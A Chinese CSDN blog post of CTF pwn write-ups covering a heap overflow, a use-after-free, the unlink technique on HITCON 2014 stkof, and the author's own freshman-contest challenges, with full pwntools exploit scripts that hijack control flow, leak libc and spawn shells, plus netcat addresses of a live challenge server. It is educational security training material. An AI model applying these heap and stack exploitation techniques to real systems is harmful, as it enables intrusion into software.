题集之三+新生考核wp

已于 2024-09-11 15:29:35 修改
阅读量912 收藏 13
点赞数 12
分类专栏: 精华刷题集_pwn 文章标签: 网络安全 安全 学习 linux
于 2024-03-31 23:32:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73858054/article/details/137212443
版权
文章介绍了两个堆溢出和UAF(UseAfterFree)漏洞的示例,通过伪造chunk和利用内存管理错误,实现了任意地址写和代码执行。展示了如何在具有NX和Canary保护的环境中利用这些漏洞进行exploit。
摘要由CSDN通过智能技术生成

题集之三

本周开始写堆相关的题

ezheap

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

就一个简简单单的堆溢出,直接看exp吧

from pwn import *
context(os='linux',arch='i386',log_level='debug')
sh = process("./ezheap")
# sh = remote("node5.anna.nssctf.cn",28070)

payload = b'a'*0x20 + b'\sh'
sh.sendline(payload)
sh.interactive()

UAF

[*] '/home/xunan/桌面/Pwn/heap/UAF/pwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

NX保护和canary,四肢健全(增删改查)。需要注意的是show功能,会将申请的序号为0的堆中的内容作为命令执行。

unsigned int show()
{
  int v1; // [esp+8h] [ebp-10h] BYREF
  unsigned int v2; // [esp+Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  puts("Input page");
  __isoc99_scanf("%d", &v1);
  if ( v1 )
  {
    if ( v1 <= 0 || v1 > i )
      puts("NO PAGE");
    else
      echo((&page)[v1]);
  }
  else
  {
    (*((void (__cdecl **)(char *))page + 1))(page);
  }
  return __readgsdword(0x14u) ^ v2;
}

同时我们也无法通过edit对序号0的堆做出修改,所以利用UAF将其值修改即可。

from pwn import *
sh = process("./pwn")
context(os='linux',arch='amd64',log_level='debug')

def malloc():
    sh.recvuntil(b':')
    sh.sendline(str(1))
def edit(idx,text):
    sh.recvuntil(b':')
    sh.sendline(str(2))
    sh.sendline(str(idx))
    sh.sendline(text)
def free(idx):
    sh.recvuntil(b':')
    sh.sendline(str(3))
    sh.sendline(str(idx))
def show(idx):
    sh.recvuntil(b':')
    sh.sendline(str(4))
    sh.sendline(str(idx))

nico_addr = 0x8048642
malloc()
free(0)
malloc()
edit(1,b'sh\x00\x00'+p32(nico_addr))
show(0)
sh.interactive()

unlike

前情提要:每周要至少写五道题,结果本周给新生出题,间接导致题目没写够,所以拿来自己的学习笔记来凑个数,笔记是跟着ctf wiki学的,题目的 exp 在最后。

原理

​ 通过伪造fake chunk,假设存在指针*p指向fake chunk,使fd=p-0x18,bk=p-0x10,然后想办法使fake chunk触发unlink即可。

​ 在本例中选择伪造next chunk的prev_chunksize使其相信fake chunk已被释放,从而在释放next chunk的时候向前合并触发unlink。

作用

通过控制

用法解析

本题复现:题目链接

​ 在本题中使用了一个指针列表 global 用来存放所有申请的chunk,列表中的指针指向堆(但是具体是堆的哪里我就不太清楚了,个人感觉好像是堆的user_data部分"关于这一部分我觉得可以参考一下堆申请后指针指向位置")。所以我们可以通过 fake chunk 将 global 列表中的地址改为&global[ ]-0x18。正式由于这样我们才能实现任意地址写。

​ 顺带一提,这道题也是实现了任意地址写,通过这种方式,殊途同归了属于是。

​ 由于IO解析看不懂,这里我就暂时不贴了,想看的话可以点下面的链接跳转过去

基本信息 
➜  2014_hitcon_stkof git:(master) file stkof
stkof: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4872b087443d1e52ce720d0a4007b1920f18e7b0, stripped
➜  2014_hitcon_stkof git:(master) checksec stkof
[*] '/mnt/hgfs/Hack/ctf/ctf-wiki/pwn/heap/example/unlink/2014_hitcon_stkof/stkof'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

可以看出,程序是 64 位的,主要开启了 Canary 和 NX 保护。

基本功能

程序存在 4 个功能,经过 IDA 分析后可以分析功能如下

  • alloc:输入 size,分配 size 大小的内存,并在 bss 段记录对应 chunk 的指针,假设其为 global
  • read_in:根据指定索引,向分配的内存处读入数据,数据长度可控,这里存在堆溢出的情况
  • free:根据指定索引,释放已经分配的内存块
  • useless:这个功能并没有什么卵用,本来以为是可以输出内容,结果什么也没有输出
本题思路
  • 利用 unlink 修改 global[2] 为 &global[2]-0x18。
  • 利用编辑功能修改 global[0] 为 free@got 地址,同时修改 global[1] 为 puts@got 地址,global[2] 为 atoi@got 地址。
  • 修改 free@gotputs@plt 的地址,从而当再次调用 free 函数时,即可直接调用 puts 函数。这样就可以泄漏函数内容。
  • free global[1],即泄漏 puts@got 内容,从而知道 system 函数地址以及 libc 中 /bin/sh 地址。
  • 修改 atoi@got 为 system 函数地址,再次调用时,输入 /bin/sh 地址即可。
关键参数解析

  1. global[ ] 指的就是申请的chunk列表,head指的就是global[]列表头部;

  2. free(3)之后他会unlike fake_chunk,然后他会将global[2]中的值改为;(&global[2])-0x18,此时再用edit(2)即可覆盖global列表;

  3. 通过修改global列表配合 exit 即可实现任意地址写。

exp
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
if args['DEBUG']:
    context.log_level = 'debug'
context.binary = "./stkof"
stkof = ELF('./stkof')
if args['REMOTE']:
    p = remote('127.0.0.1', 7777)
else:
    p = process("./stkof")
log.info('PID: ' + str(proc.pidof(p)[0]))
libc = ELF('./libc.so.6')
head = 0x602140


def alloc(size):
    p.sendline('1')
    p.sendline(str(size))
    p.recvuntil('OK\n')


def edit(idx, size, content):
    p.sendline('2')
    p.sendline(str(idx))
    p.sendline(str(size))
    p.send(content)
    p.recvuntil('OK\n')


def free(idx):
    p.sendline('3')
    p.sendline(str(idx))


def exp():
    # trigger to malloc buffer for io function
    alloc(0x100)  # idx 1
    # begin
    alloc(0x30)  # idx 2
    # small chunk size in order to trigger unlink
    alloc(0x80)  # idx 3
    # a fake chunk at global[2]=head+16 who's size is 0x20
    payload = p64(0)  #prev_size
    payload += p64(0x20)  #size
    payload += p64(head + 16 - 0x18)  #fd
    payload += p64(head + 16 - 0x10)  #bk
    payload += p64(0x20)  # next chunk's prev_size bypass the check
    payload = payload.ljust(0x30, 'a')

    # overwrite global[3]'s chunk's prev_size
    # make it believe that prev chunk is at global[2]
    payload += p64(0x30)

    # make it believe that prev chunk is free
    payload += p64(0x90)
    edit(2, len(payload), payload)

    # unlink fake chunk, so global[2] =&(global[2])-0x18=head-8
    free(3)		# 向前合并 fake_chunk
    p.recvuntil('OK\n')

    # overwrite global[0] = free@got, global[1]=puts@got, global[2]=atoi@got
    payload = 'a' * 8 + p64(stkof.got['free']) + p64(stkof.got['puts']) + p64(stkof.got['atoi'])
    edit(2, len(payload), payload)

    # edit free@got to puts@plt
    payload = p64(stkof.plt['puts'])
    edit(0, len(payload), payload)

    # free global[1] to leak puts addr
    free(1)
    puts_addr = p.recvuntil('\nOK\n', drop=True).ljust(8, '\x00')
    puts_addr = u64(puts_addr)
    log.success('puts addr: ' + hex(puts_addr))
    libc_base = puts_addr - libc.symbols['puts']
    binsh_addr = libc_base + next(libc.search('/bin/sh'))
    system_addr = libc_base + libc.symbols['system']
    log.success('libc base: ' + hex(libc_base))
    log.success('/bin/sh addr: ' + hex(binsh_addr))
    log.success('system addr: ' + hex(system_addr))

    # modify atoi@got to system addr
    payload = p64(system_addr)
    edit(2, len(payload), payload)
    p.send(p64(binsh_addr))
    p.interactive()


if __name__ == "__main__":
    exp()

快来签到

前面有说到,本周为新生出了点题,不过学弟暂时只做出来两道,一道签到一道整数溢出,由于出的题也要做wp,所以这里就拿来凑数了。

出题思路

本意是为了防止学弟一道都写不出来留的签到题,64位编译,直接给shell,但是为了恶搞整了个udx加壳,反编译看不懂,嘿嘿

解题思路

直接nc即可获得shell

$ nc 8.130.106.113 10001
ls
bin
dev
flag.txt
lib
lib32
lib64
pwn

pwn1

出题思路

本意是考一下整数溢出来着,后来想了想索性字符串溢出一起考了,不过由于没测题所以比较意外的是居然还要注意栈对齐。

关于栈对齐的知识,可以参考这篇文章 > 传送门 <

解题思路
$checksec pwn1
[*] '/home/xunan/桌面/Pwn/newpwn/pwnlist/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
--------------------------------------------------
__int64 vuln()
{
  __int64 result; // rax
  int nbytes; // [rsp+Ch] [rbp-34h] BYREF
  char nbytes_4[44]; // [rsp+10h] [rbp-30h] BYREF
  int v3; // [rsp+3Ch] [rbp-4h]

  __isoc99_scanf("%d", &nbytes);
  puts("Input you payload:");
  read(0, nbytes_4, (unsigned int)nbytes);
  v3 = strlen(nbytes_4);
  if ( v3 > 32 || (result = (unsigned int)nbytes, nbytes > 32) )
  {
    puts("size out.");
    exit(0);
  }
  return result;
}

查看关键函数可以看到,本题有一个整数溢出和一个字符串溢出,另外其实有一个后门函数。

所以绕过这两处之后直接跳转到后门函数即可,不过需要注意可能需要进行栈对齐

from pwn import *
sh = process('./pwn1')

backdoor_addr = 0x40081B
ret_addr = 0x400611
sh.sendline(str(-1))
payload = b'\x00'*0x30 + p64(0) + p64(backdoor_addr)
sh.sendline(payload)
sh.interactive()

最后(xinshengkaohe)

最后的最后,新生考核赛已经完事儿了,租的服务器暂时闲置了,但是比赛的pwn题还在上面跑着。至少还能跑一周吧,都是一些比较新手向的题目,感兴趣的可以连上去看看。
题目以及源码放资源里嘞,复现环境看下面

ex2	: nc 8.130.106.113 10000
pwn	: nc 8.130.106.113 10001
pwn1: nc 8.130.106.113 10002
pwn2: nc 8.130.106.113 10003
pwn3: nc 8.130.106.113 10004

就这样吧,诸君武运亨通共勉。

进击的萝卜君
关注
专栏目录
2021 SWUP新生wp
XikX_eleven的博客
10-12 2036
2021 SWUP新生wpWebgift_F12caidao Web gift_F12 如题所示f12找到flag caidao 蚁剑连接(中国菜刀连接可能会显示没有root权限) 根目录flag
NSSCTF-HUBUCTF新生赛-wp
F1rstb100d
09-21 1346
NSSCTF-HUBUCTF新生赛-wp
2022 SWPUCTF Web+Crypto方向wp
ph0ebus的博客
10-29 6951
简单阅读代码可以发现,__wakeup()方法会首先被激活,覆盖变量的值使flag不能被回显,因此这里需要绕过__wakeup()方法,__wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。然后想办法读取文件,cat tac tail都被过滤了,那我们还可以利用nl查看文件内容,这里发现数字被过滤了,我们想到了*来匹配,但是*也被过滤了,尽管如此,我们还可以用?但是里面没有看到类似flag的东西,那就进入根目录看看,但是空格被过滤了,可以用${IFS}绕过。
ACTF2020 新生赛 -- WP
会下雪的晴天
05-18 3192
做题思路记录,同时感谢赵师傅和Y1NG的环境与源码 文章目录[ACTF2020 新生赛]Include[ACTF2020 新生赛]Exec[ACTF2020 新生赛]BackupFile[ACTF2020 新生赛]Upload [ACTF2020 新生赛]Include 主页显示是一个链接,点进去看看,URL出现file=,结合题目判断为文件包含 用伪协议读flag.php,一般语句为php://filter/read=convert.base64-encode/resource=xxx php:/.
记一次360众测仿真实战靶场考核WP
god_Zeo的安全博客
04-06 8574
0x00 考核主要分为两部分 第一部分为客观题:分为单选题,多选题,和判断题。 我记录了一道有趣的题,也是不清楚正确答案的群 第二部分为操作题: 0x01客观题 我记录了一道有趣的题,也是不清楚正确答案,有大佬知道吗 0x02:操作题 源码分析题,给你源码提及一个数据 PHP == 弱语言绕过 ,因为没弄过CTF也是印象比较深刻 网站被黑,可以下载整站,找后门 下载源码,找...
2019 moeCTF新生题 部分wp
xiaohuihui的博客
09-15 1万+
author: xiaohuihui statis:持续更新 这篇博客是博主参加moeCTF后写的WP,一方面记录一下,另一方面分享部分心得给广大互联网的朋友。题目附件可以去 moectf 官方网站 下载,也可以留邮箱。后期可能会放出网盘链接。本 blog尽可能收录所有赛题,标题中带有 × 的表示博主尚未解出。
WP|7】深入解析WP_Query
热门推荐
颜淡慕潇
06-03 1万+
`WP_Query` 是 WordPress 中一个强大的类,用于自定义和运行数据库查询,获取帖子、页面和自定义文章类型。它是 WordPress 查询系统的核心,可以根据各种参数来查询和显示内容。以下是对 `WP_Query` 的详细介绍:
WP|4】WordPress 简码(Shortcode)开发详解
颜淡慕潇
05-28 5617
简码是 WordPress 提供的一项强大功能,能够帮助开发者创建灵活、可复用的内容块。通过本文的讲解,你可以了解从基础到高级的简码开发技巧。掌握这些技巧,可以让你在开发 WordPress 主题和插件时,更加高效地实现各种动态内容和复杂功能。希望这篇文章对你的简码开发之路有所帮助。
实验吧隐写术WP(三)
Yale的博客
04-02 1万+
1.心中无码(http://www.shiyanbar.com/ctf/1947) 直接stegsolve看发现没怎么样,但是在blue的0处看起来有问题 跑python#coding:utf-8 from PIL import Imagelena = Image.open('Lena.png') b0 = '' #将像素点弄为0,1代码 bnum = 0 width,height =
Android 智能指针详解 -- wp
私房菜
12-21 1万+
上一篇关于sp的博文,通过 source code 来解释了sp的功能,sp被称为强指针,但是强引用更贴切点。那么弱引用wp到底有什么功能?与sp有什么区别?这一篇通过 source code 来解释。
简洁自适应漂亮个人博客主题Cosy3.1.3+积木部分插件+支持最新WP主题.txt
03-21
简洁自适应漂亮个人博客主题Cosy3.1.3+积木部分插件+支持最新WP主题.txt
WordPress 最新RiPro9.0修正升级版+WP两款美化包+稀有插件
06-07
WordPress 最新RiPro9.0修正升级版+WP两款美化包+稀有插件 模板和美化包路径:\wp-content\themes 插件路径:\wp-content\plugins WordPress 最新RiPro9.0修正升级版+WP两款美化包+稀有插件
ripro9.0修正升级版+WP两款美化包+稀有插件
05-27
RiPro9.0二开版本,这个模板花了钱买的,我又给各位弄了2个美化包和全屏水印以及防复制插件! 模板和美化包路径:\wp-content\themes 插件路径:\wp-content\plugins
WP Rocket缓存插件v3.2.3.1开发版+授权版
01-10
WP Rocket缓存插件是当前最高效也是最灵活的WordPress静态缓存插件。可以优化你的JS CSS文件结构减少多次请求达到优化速度的目的,还集成了图片延迟加载对最求极致加速的用户不错的选择,通过使用这个插件,能使得你...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8544
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
关于Flutter空安全升级方案整理
清风洒脱
11-08 991
Flutter 从 2.0 版本开始支持空安全(Null Safety)。升级到空安全后,由于语法的变动,基本上整个工程,代码都爆红,这对项目来说简直是灾难性的打击,不升级的话只是缓兵之计,因为随着时间的推移,flutter将不再维护非空安全的版本,同时一些三方库也将无法使用,因此空安全升级变成了一个不得不做的事情,项目越复杂需要的时间也就越持久,考虑到对项目的稳定性,和开发周期。选择一个合适自己项目的迁移方案非常重要。下面自己会讲下自己对空安全迁移的理解和实施方案,目前成功迁移几个项目,还是比较有经验的。
【网络】深入理解 HTTPS:确保数据传输安全的核心协议
人生苦短,睡觉要紧,睡醒再说
11-06 1760
HTTPS(HyperText Transfer Protocol Secure)是 HTTP 协议的安全版本。HTTP 是用于客户端与服务器之间传输网页数据的协议,而 HTTPS 在 HTTP 协议的基础上添加了一层SSL/TLS加密协议,使得传输的数据在网络中不易被窃取或篡改。HTTPS 通常用于传输敏感信息,如登录凭证、支付信息、个人数据等。与 HTTP 协议不同,HTTPS 在数据传输过程中会对信息进行加密,确保数据在传输过程中不被第三方监听或修改。
【浪潮商城-注册安全分析报告-无验证方式导致安全隐患】
最新发布
weixin_46641057的博客
11-09 1467
浪潮集团是中国领先的云计算、大数据服务商,拥有浪潮信息、浪潮软件、浪潮数字企业三家上市公司。主要业务涉及计算装备、软件、云计算服务、新一代通信、大数据及若干应用场景。已为全球一百二十多个国家和地区提供IT产品和服务。作为国内做电脑硬件起家发展为综合型大型科技企业,拥有雄厚的技术实力,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 482
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
WP系列智能三回路数字显示控制器详解
"WP系列智能三回路数字显示控制上润" WP系列智能三回路数字显示控制器是一款专门设计用于工业自动化领域的仪表设备,由上润公司提供技术支持和相关资料下载。这款控制器具备高精度和强抗干扰能力,适用于多种复杂的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值